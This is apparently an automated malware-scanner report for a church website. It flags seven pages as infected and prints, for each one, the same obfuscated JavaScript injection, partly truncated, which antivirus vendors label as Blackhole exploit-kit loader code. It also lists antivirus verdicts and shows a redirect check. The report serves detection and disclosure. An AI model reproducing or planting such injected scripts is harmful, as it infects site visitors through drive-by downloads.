Malware Scanner report for rccg-royalchristiancentre.org

Malicious/Suspicious/Total urls checked: 7/0/10

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "rccg-royalchristiancentre.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rccg-royalchristiancentre.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://rccg-royalchristiancentre.org/	200 OK Content-Length: 15374 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://c520866.r66.cf2.rackcdn.com/1/js/easy_rotator.min.js	200 OK Content-Length: 155522 Content-Type: application/javascript	clean
http://rccg-royalchristiancentre.org/index.html	200 OK Content-Length: 15374 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/about.html	200 OK Content-Length: 7255 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/bulletin.html	200 OK Content-Length: 7555 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/gallery.html	200 OK Content-Length: 5861 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/contact.html	200 OK Content-Length: 7523 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/venue.html	200 OK Content-Length: 7152 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) mic="y";eolg="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[eolg].body)==null}()}catch(mtcu){djy=function(uchla){uchla="fr"+"omCh"+uchla;for(git=0;git<mic.length;git++){vqg+=String[uchla](psqdzl(dxype+(mic[git]))-(21));}};};psqdzl=(eval);dxype="0x";vzxtwl=0;try{;}catch(veraap){vzxtwl=1}if(!vzxtwl){try{++psqdzl(eolg)["\x62o"+"d"+mic]}catch(mtcu){opnyx="^";}mic="35^7b^8a^83^78^89^7e^84^83^35^89^8a^45^4e^3d^3e^35^90^22^1f^35^8b^76^87^35^88^89^76^89^7e^78^52^3c^76^7f^76^8 ... 3612 bytes are skipped ...3^7c^3d^35^81^7a^83^41^35^7a^83^79^35^3e^35^3e^50^22^1f^92^22^1f^7e^7b^35^3d^83^76^8b^7e^7c^76^89^84^87^43^78^84^84^80^7e^7a^5a^83^76^77^81^7a^79^3e^22^1f^90^22^1f^7e^7b^3d^5c^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^3e^52^52^4a^4a^3e^90^92^7a^81^88^7a^90^68^7a^89^58^84^84^80^7e^7a^3d^3c^8b^7e^88^7e^89^7a^79^74^8a^86^3c^41^35^3c^4a^4a^3c^41^35^3c^46^3c^41^35^3c^44^3c^3e^50^22^1f^22^1f^89^8a^45^4e^3d^3e^50^22^1f^92^22^1f^92".split(opnyx);vqg="";djy("arCode");psqdzl(""+vqg);} Antivirus reports: AntiVir JS/Blacole.NY.6 Avast JS:Decode-BFW [Trj] Ad-Aware JS:Exploit.BlackHole.BN nProtect JS:Exploit.BlackHole.BN Emsisoft JS:Exploit.BlackHole.BN (B) Comodo TrojWare.JS.iFrame.D McAfee-GW-Edition JS/Exploit-Blacole.gc Microsoft Exploit:JS/Blacole.NY Kaspersky Trojan-Downloader.JS.Iframe.det MicroWorld-eScan JS:Exploit.BlackHole.BN Fortinet JS/Kryptik.HOL!tr McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure JS:Exploit.BlackHole.BN AVG Script/Exploit.Kit Norman Blacole.WU GData JS:Exploit.BlackHole.BN BitDefender JS:Exploit.BlackHole.BN
http://rccg-royalchristiancentre.org/www.edesigns365.com	404 Not Found Content-Length: 217 Content-Type: text/html	clean
http://rccg-royalchristiancentre.org/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rccg-royalchristiancentre.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Apr 2014 12:44:30 GMT
Via: 1.1 varnish
Age: 0
ETag: "c5fab166-3c0e-4f74e72edc0f9"
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Fri, 18 Apr 2014 10:16:54 GMT
X-Varnish: 3122176753 3122176715

Second query (visit from search engine):
GET / HTTP/1.1
Host: rccg-royalchristiancentre.org
Referer: http://www.google.com/search?q=rccg-royalchristiancentre.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for rccg-royalchristiancentre.org

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools